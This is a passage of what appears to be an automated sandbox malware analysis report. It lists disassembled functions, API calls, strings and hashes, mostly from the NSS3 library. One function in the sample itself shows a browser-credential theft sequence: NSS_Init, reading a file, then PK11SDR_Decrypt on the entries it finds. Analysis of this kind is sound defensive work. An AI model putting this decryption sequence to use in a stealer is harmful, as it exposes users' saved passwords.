                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6CB7AF99
                                                                                          • PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6CB7AFBE
                                                                                          • PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6CB7AFD9
                                                                                          • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CB7AFF4
                                                                                          • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CB7B00F
                                                                                          • PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CB7B028
                                                                                          • PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6CB7B041
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                          • String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage
                                                                                          • API String ID: 1003633598-1612141141
                                                                                          • Opcode ID: 1667eff680e69f84de9aac97121dc84aaf21f3e773a64a6bed5b9fd0eb9b77e7
                                                                                          • Instruction ID: 54cb26eeee5a64ef0bbf6cdb528aac415e18807f807e5d8bd9d61fd35618397e
                                                                                          • Opcode Fuzzy Hash: 1667eff680e69f84de9aac97121dc84aaf21f3e773a64a6bed5b9fd0eb9b77e7
                                                                                          • Instruction Fuzzy Hash: FC41A476601194AFDB108F95ED9CE8E37B5EB4230DF484024FD18A7A11E730D869DFA5
                                                                                          Function 6CB86CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6CB86910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CB86943
                                                                                            • Part of subcall function 6CB86910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CB86957
                                                                                            • Part of subcall function 6CB86910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CB86972
                                                                                            • Part of subcall function 6CB86910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CB86983
                                                                                            • Part of subcall function 6CB86910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CB869AA
                                                                                            • Part of subcall function 6CB86910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CB869BE
                                                                                            • Part of subcall function 6CB86910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CB869D2
                                                                                            • Part of subcall function 6CB86910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CB869DF
                                                                                            • Part of subcall function 6CB86910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CB86A5B
                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CB86D8C
                                                                                          • free.MOZGLUE(00000000), ref: 6CB86DC5
                                                                                          • free.MOZGLUE(?), ref: 6CB86DD6
                                                                                          • free.MOZGLUE(?), ref: 6CB86DE7
                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CB86E1F
                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB86E4B
                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB86E72
                                                                                          • free.MOZGLUE(?), ref: 6CB86EA7
                                                                                          • free.MOZGLUE(?), ref: 6CB86EC4
                                                                                          • free.MOZGLUE(?), ref: 6CB86ED5
                                                                                          • free.MOZGLUE(00000000), ref: 6CB86EE3
                                                                                          • free.MOZGLUE(?), ref: 6CB86EF4
                                                                                          • free.MOZGLUE(?), ref: 6CB86F08
                                                                                          • free.MOZGLUE(00000000), ref: 6CB86F35
                                                                                          • free.MOZGLUE(?), ref: 6CB86F44
                                                                                          • free.MOZGLUE(?), ref: 6CB86F5B
                                                                                          • free.MOZGLUE(00000000), ref: 6CB86F65
                                                                                            • Part of subcall function 6CB86C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CB8781D,00000000,6CB7BE2C,?,6CB86B1D,?,?,?,?,00000000,00000000,6CB8781D), ref: 6CB86C40
                                                                                            • Part of subcall function 6CB86C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CB8781D,?,6CB7BE2C,?), ref: 6CB86C58
                                                                                            • Part of subcall function 6CB86C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CB8781D), ref: 6CB86C6F
                                                                                            • Part of subcall function 6CB86C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CB86C84
                                                                                            • Part of subcall function 6CB86C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CB86C96
                                                                                            • Part of subcall function 6CB86C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CB86CAA
                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB86F90
                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB86FC5
                                                                                          • PK11_GetInternalKeySlot.NSS3 ref: 6CB86FF4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                          • String ID:
                                                                                          • API String ID: 1304971872-0
                                                                                          • Opcode ID: bbb03a2d8fd735febdbd2c4641e8e241230eb202ff13a88e115ad504f7d307fa
                                                                                          • Instruction ID: fc68863f3c9e6112f1e369158101ec51231457a7954edb02eba8e975351fe3ba
                                                                                          • Opcode Fuzzy Hash: bbb03a2d8fd735febdbd2c4641e8e241230eb202ff13a88e115ad504f7d307fa
                                                                                          • Instruction Fuzzy Hash: 8DB181B0E122999FDF00DFA5D845B9EBBB4FF09349F140024E815E7A40E735E955CBA2
                                                                                          Function 6CB84C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB84C4C
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6CB84C60
                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CB84CA1
                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CB84CBE
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CB84CD2
                                                                                          • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB84D3A
                                                                                          • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB84D4F
                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CB84DB7
                                                                                            • Part of subcall function 6CBEDD70: TlsGetValue.KERNEL32 ref: 6CBEDD8C
                                                                                            • Part of subcall function 6CBEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CBEDDB4
                                                                                            • Part of subcall function 6CB307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CAC204A), ref: 6CB307AD
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAC204A), ref: 6CB307CD
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAC204A), ref: 6CB307D6
                                                                                            • Part of subcall function 6CB307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CAC204A), ref: 6CB307E4
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,6CAC204A), ref: 6CB30864
                                                                                            • Part of subcall function 6CB307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB30880
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,?,6CAC204A), ref: 6CB308CB
                                                                                            • Part of subcall function 6CB307A0: TlsGetValue.KERNEL32(?,?,6CAC204A), ref: 6CB308D7
                                                                                            • Part of subcall function 6CB307A0: TlsGetValue.KERNEL32(?,?,6CAC204A), ref: 6CB308FB
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB84DD7
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6CB84DEC
                                                                                          • PR_Unlock.NSS3(?), ref: 6CB84E1B
                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6CB84E2F
                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB84E5A
                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6CB84E71
                                                                                          • free.MOZGLUE(00000000), ref: 6CB84E7A
                                                                                          • PR_Unlock.NSS3(?), ref: 6CB84EA2
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB84EC1
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6CB84ED6
                                                                                          • PR_Unlock.NSS3(?), ref: 6CB84F01
                                                                                          • free.MOZGLUE(00000000), ref: 6CB84F2A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                          • String ID:
                                                                                          • API String ID: 759471828-0
                                                                                          • Opcode ID: 0c23cc2b79868d37e9cfa7c1565e2240af8ac8b7908e851ccb33923d378a9b70
                                                                                          • Instruction ID: b6e588e02fd3c9bfffab67ac6aacd56bea1e30f2994c29c3a8f8f8f8643da182
                                                                                          • Opcode Fuzzy Hash: 0c23cc2b79868d37e9cfa7c1565e2240af8ac8b7908e851ccb33923d378a9b70
                                                                                          • Instruction Fuzzy Hash: 7EB1F171A012459FDB00EF68D854AAE77B8FF09319F044128ED1997B00EB30E965CFA2
                                                                                          Function 0040C7D0 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 383filestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • NSS_Init.NSS3(00000000), ref: 0040C7E5
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0081AC28,00000000,?,004213F0,00000000,?,?), ref: 0040C8AC
                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C8C9
                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C8D5
                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040C8E8
                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040C8F5
                                                                                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040C919
                                                                                          • StrStrA.SHLWAPI(?,0081A988,00420B37), ref: 0040C937
                                                                                          • StrStrA.SHLWAPI(00000000,0081AC58), ref: 0040C95E
                                                                                          • StrStrA.SHLWAPI(?,0081B6D8,00000000,?,004213FC,00000000,?,00000000,00000000,?,00816A20,00000000,?,004213F8,00000000,?), ref: 0040CAE2
                                                                                          • StrStrA.SHLWAPI(00000000,0081BA18), ref: 0040CAF9
                                                                                            • Part of subcall function 0040C660: memset.MSVCRT ref: 0040C693
                                                                                            • Part of subcall function 0040C660: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00816BA0), ref: 0040C6B1
                                                                                            • Part of subcall function 0040C660: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C6BC
                                                                                            • Part of subcall function 0040C660: PK11_GetInternalKeySlot.NSS3 ref: 0040C6CA
                                                                                            • Part of subcall function 0040C660: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C6E5
                                                                                            • Part of subcall function 0040C660: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C72B
                                                                                            • Part of subcall function 0040C660: memcpy.MSVCRT ref: 0040C752
                                                                                            • Part of subcall function 0040C660: PK11_FreeSlot.NSS3(?), ref: 0040C7A1
                                                                                          • StrStrA.SHLWAPI(?,0081BA18,00000000,?,00421400,00000000,?,00000000,00816BA0), ref: 0040CB9A
                                                                                          • StrStrA.SHLWAPI(00000000,00816C40), ref: 0040CBB1
                                                                                            • Part of subcall function 0040C660: lstrcat.KERNEL32(?,00420B2E), ref: 0040C783
                                                                                            • Part of subcall function 0040C660: lstrcat.KERNEL32(?,00420B2F), ref: 0040C797
                                                                                            • Part of subcall function 0040C660: lstrcat.KERNEL32(?,00420B33), ref: 0040C7B8
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040CC84
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040CCDC
                                                                                          • NSS_Shutdown.NSS3 ref: 0040CCEA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$??2@AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeStringmemcpymemset
                                                                                          • String ID:
                                                                                          • API String ID: 2503097572-3916222277
                                                                                          • Opcode ID: 40189f454ed04c75086519dda5c54b2934864b46fa086ab56f33ac2229eb62c3
                                                                                          • Instruction ID: 91e77cebffad47ece097f7429d4e9b812732713b5b21c7dde3d323aaba1c439f
                                                                                          • Opcode Fuzzy Hash: 40189f454ed04c75086519dda5c54b2934864b46fa086ab56f33ac2229eb62c3
                                                                                          • Instruction Fuzzy Hash: 15E18E71801108ABCB14EBA1DC96FEEB739AF14314F00415EF40773191EF786A99CBAA
                                                                                          Function 6CBD6E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CBD6BF7), ref: 6CBD6EB6
                                                                                            • Part of subcall function 6CB31240: TlsGetValue.KERNEL32(00000040,?,6CB3116C,NSPR_LOG_MODULES), ref: 6CB31267
                                                                                            • Part of subcall function 6CB31240: EnterCriticalSection.KERNEL32(?,?,?,6CB3116C,NSPR_LOG_MODULES), ref: 6CB3127C
                                                                                            • Part of subcall function 6CB31240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CB3116C,NSPR_LOG_MODULES), ref: 6CB31291
                                                                                            • Part of subcall function 6CB31240: PR_Unlock.NSS3(?,?,?,?,6CB3116C,NSPR_LOG_MODULES), ref: 6CB312A0
                                                                                          • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CC7FC0A,6CBD6BF7), ref: 6CBD6ECD
                                                                                          • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CBD6EE0
                                                                                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CBD6EFC
                                                                                          • PR_NewLock.NSS3 ref: 6CBD6F04
                                                                                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CBD6F18
                                                                                          • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CBD6BF7), ref: 6CBD6F30
                                                                                          • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CBD6BF7), ref: 6CBD6F54
                                                                                          • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CBD6BF7), ref: 6CBD6FE0
                                                                                          • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CBD6BF7), ref: 6CBD6FFD
                                                                                          Strings
                                                                                          • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CBD6F4F
                                                                                          • NSS_SSL_CBC_RANDOM_IV, xrefs: 6CBD6FF8
                                                                                          • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CBD6FDB
                                                                                          • SSLKEYLOGFILE, xrefs: 6CBD6EB1
                                                                                          • SSLFORCELOCKS, xrefs: 6CBD6F2B
                                                                                          • # SSL/TLS secrets log file, generated by NSS, xrefs: 6CBD6EF7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                          • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                          • API String ID: 412497378-2352201381
                                                                                          • Opcode ID: 31bc29bb96cddcce3f0f5c33960dba2742da81a76f387469b5d89d4f584d6399
                                                                                          • Instruction ID: 8bf2ffbc6c8f7b6fbb45a9982b5edda97cd10950c00db9783f0e5c37ee997bd8
                                                                                          • Opcode Fuzzy Hash: 31bc29bb96cddcce3f0f5c33960dba2742da81a76f387469b5d89d4f584d6399
                                                                                          • Instruction Fuzzy Hash: 91A13673E65CC08AEB00466CDC053C936B1AB87379F1A47A9E832D7ED8DBB5B4418342
                                                                                          Function 6CB76D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_LogPrint.NSS3(C_Digest), ref: 6CB76D86
                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB76DB4
                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB76DC3
                                                                                            • Part of subcall function 6CC5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC5D963
                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6CB76DD9
                                                                                          • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CB76DFA
                                                                                          • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CB76E13
                                                                                          • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6CB76E2C
                                                                                          • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6CB76E47
                                                                                          • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6CB76EB9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                          • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
                                                                                          • API String ID: 1003633598-2270781106
                                                                                          • Opcode ID: c4723f60cd01689534beebddd4230b8e79b8fa573c2b3ce35cbcabea4e025726
                                                                                          • Instruction ID: 3ba290b56f2a6b8a864901cb3b8609a9fe92af04077c5f01b1fe059b53a9df47
                                                                                          • Opcode Fuzzy Hash: c4723f60cd01689534beebddd4230b8e79b8fa573c2b3ce35cbcabea4e025726
                                                                                          • Instruction Fuzzy Hash: 2441B375601164AFDB109BA5ED9CA8E3BB1EB4231DF484014FD19E7A11EB30D869CBB2
                                                                                          Function 6CB98E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6CB98E01,00000000,6CB99060,6CCA0B64), ref: 6CB98E7B
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6CB98E01,00000000,6CB99060,6CCA0B64), ref: 6CB98E9E
                                                                                          • PORT_ArenaAlloc_Util.NSS3(6CCA0B64,00000001,?,?,?,?,6CB98E01,00000000,6CB99060,6CCA0B64), ref: 6CB98EAD
                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6CB98E01,00000000,6CB99060,6CCA0B64), ref: 6CB98EC3
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6CB98E01,00000000,6CB99060,6CCA0B64), ref: 6CB98ED8
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6CB98E01,00000000,6CB99060,6CCA0B64), ref: 6CB98EE5
                                                                                          • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6CB98E01), ref: 6CB98EFB
                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CCA0B64,6CCA0B64), ref: 6CB98F11
                                                                                          • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6CB98F3F
                                                                                            • Part of subcall function 6CB9A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6CB9A421,00000000,00000000,6CB99826), ref: 6CB9A136
                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB9904A
                                                                                          Strings
                                                                                          • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6CB98E76
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
